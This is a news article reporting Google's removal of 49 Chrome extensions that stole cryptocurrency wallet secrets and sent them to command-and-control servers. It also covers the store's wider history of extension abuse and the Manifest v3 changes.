Google has ousted 49 Chrome extensions from its Chrome Web Store because they contained malicious code, a ritual that should be familiar after a decade of purges.
"Essentially, the extensions are phishing for secrets – mnemonic phrases, private keys, and keystore files," explained Harry Denley, director of security at MyCrypto, on Tuesday in a blog post. "Once the user has entered them, the extension sends an HTTP POST request to its backend, where the bad actors receive the secrets and empty the accounts."
Denley said the extension set – which took aim at services like Ledger, Trezoe, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus, and KeyKeep – was associated with 14 command-and-control servers that are believed to be linked to the same person or group, possibly in Russia.
A video of the MEW CW (MyEtherWallet) extension shows how it listens for secrets entered into the browser and sends them out over the network to the malware author.
According to Denley, a few of the command-and-control servers were old but 80 per cent of them are associated with domains registered in March or April. The extensions themselves began to show up in February, with most arriving in the next two months.
Some of the extensions, he said, were supported by fake five-star reviews; some internet good samaritans also tried to warn others that the extensions were malicious. Google did not immediately respond to a request for comment but the 49 extensions identified by MyCrypto and PhishFort are no longer available in the Chrome Web Store.
Google tests hiding Chrome extension icons by default, developers definitely not amused by the changeREAD MORE
About two million people currently use extensions from the Chrome Web Store, according to a report earlier this month from Extension Monitor. Last month, the store had 213,054 extensions, up 3,468 from February.
That same month, Google confirmed a significant Chrome extension purge, amounting to about 500 extensions. In January, Google briefly halted the publication of any new extensions because of a fraud surge.
Chrome extension security has been an issue since before the Chrome Web Store launched in December 2010. Recall our report on a Chrome extension trojan from April 2010.
Its most recent effort involves retooling its extension APIs to make them less powerful, a project dubbed Manifest v3. This should limit abuse but it's also likely to hinder legitimate developers trying to implement content blocking and privacy features that rely on intercepting and rewriting network traffic. ®